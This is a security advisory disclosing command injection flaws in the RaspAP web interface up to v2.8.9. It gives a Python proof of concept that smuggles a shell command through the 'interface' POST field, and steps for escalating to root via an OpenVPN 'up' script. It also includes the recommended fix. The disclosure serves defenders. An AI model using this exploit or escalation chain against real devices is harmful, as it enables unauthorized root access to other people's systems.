../ advisories/
Multiple command injection vulnerabilities are present in the RaspAP web interface. They allow an authenticated user to execute arbitrary OS commands with the privileges of the web server. Additional factors in the default configuration allow elevation to root privileges.
RaspAP v2.8.9 and older
#!/usr/bin/env python3
import re
import requests
TARGET="10.3.141.1"
CREDS="admin:secret"
URL=f"http://{CREDS}@{TARGET}/hostapd_conf"
sess = requests.Session()
# Get a valid CSRF token
doc = sess.get(URL).text.replace("\n", "")
csrf = re.match('.*name="csrf_token" value="([^"]+)".*', doc).group(1)
print(csrf)
res = sess.post(URL,
data={
"csrf_token": csrf,
"txpower": "auto",
# Command payload is here:
"interface": ";uptime > /tmp/hax; echo",
}
)
if res.status_code != 200:
print("Failed to execute command")/tmp/hax has been created on the raspi, and contains the output of uptime.There are two almost identical instances of the vulnerability, at hostapd.php:103 and hostapd.php:108. In both instances, an unsanitized POST variable is fed into a command executed using exec().
A third instance exists at configure_client.php:20, exploitable in a similar manner.
An authenticated user is able to execute arbitrary commands as www-data.
In the default RaspAP configuration, this can be leveraged to gain root access by exploiting two of the configured sudo permissions; overwrite the openvpn client configuration to set the following:
script-security 2
up /tmp/payload.shand establish an OpenVPN connection. /tmp/payload.sh will be executed with root privileges.
Apply sanitization to the txpower and interface parameters, and use the PHP built-in escapeshellarg() before passing them to exec().
configure_client.php)hostapd.php)